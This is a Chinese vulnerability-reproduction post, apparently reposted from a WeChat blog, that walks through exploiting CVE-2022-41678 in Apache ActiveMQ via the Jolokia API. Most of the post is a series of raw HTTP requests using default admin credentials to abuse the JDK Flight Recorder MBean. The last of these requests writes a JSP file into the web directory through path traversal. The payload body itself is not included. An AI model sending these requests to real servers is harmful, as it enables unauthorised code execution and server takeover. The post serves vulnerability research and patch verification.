【漏洞复现】ActiveMQ-Jolokia-远程代码执行漏洞

admin 2023年12月1日08:19:00评论112 views字数 2301阅读7分40秒阅读模式

Apache-ActiveMQ-Jolokia-远程代码执行漏洞-CVE-2022-41678

影响范围

Apache ActiveMQ before 5.16.6
Apache ActiveMQ 5.17.0 before 5.17.4
Apache ActiveMQ 5.18.0 unaffected
Apache ActiveMQ 6.0.0 unaffected

漏洞复现版本下载

https://activemq.apache.org/activemq-5017000-release

漏洞复现

新建记录

POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 136

{
    "type""EXEC",
    "mbean""jdk.management.jfr:type=FlightRecorder",
    "operation""newRecording",
    "arguments": []
}

记住这个 value参数中的值,后面的poc要用到,例如现在是4

【漏洞复现】ActiveMQ-Jolokia-远程代码执行漏洞

写入payload

payload太长了,放在最后了

【漏洞复现】ActiveMQ-Jolokia-远程代码执行漏洞


POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 136

{
    "type""EXEC",
    "mbean""jdk.management.jfr:type=FlightRecorder",
    "operation""setConfiguration",
    "arguments": [4,""]
}


【漏洞复现】ActiveMQ-Jolokia-远程代码执行漏洞

导出录制到web目录

POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 141

{
    "type""EXEC",
    "mbean""jdk.management.jfr:type=FlightRecorder",
    "operation""startRecording",
    "arguments": [4]
}

【漏洞复现】ActiveMQ-Jolokia-远程代码执行漏洞

POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 138

{
    "type""EXEC",
    "mbean""jdk.management.jfr:type=FlightRecorder",
    "operation""stopRecording",
    "arguments": [4]
}

【漏洞复现】ActiveMQ-Jolokia-远程代码执行漏洞

导出到web目录

POST /api/jolokia/ HTTP/1.1
Host: localhost:8161
Origin:localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Content-Type: application/json
Content-Length: 159

{
    "type""EXEC",
    "mbean""jdk.management.jfr:type=FlightRecorder",
    "operation""copyTo",
    "arguments": [4,"../../webapps/test.jsp"]
}


【漏洞复现】ActiveMQ-Jolokia-远程代码执行漏洞

文件写入成功

【漏洞复现】ActiveMQ-Jolokia-远程代码执行漏洞

【漏洞复现】ActiveMQ-Jolokia-远程代码执行漏洞

漏洞来源

  • https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/
  • https://github.com/wy876/POC

payload

本地搭建源码,配置环境搞了好久都不行,无法调试代码,最后的payload是搜索GitHub关键字找到的

  • https://github.com/gradle/gradle-profiler/blob/2eb14e031fbd48203fb05b28183decd1ee2304de/src/main/resources/org/gradle/profiler/jfr/openjdk.jfc#L4

- END -


原文始发于微信公众号(安全逐梦人):【漏洞复现】ActiveMQ-Jolokia-远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月1日08:19:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】ActiveMQ-Jolokia-远程代码执行漏洞http://cn-sec.com/archives/2258255.html

发表评论

匿名网友 填写信息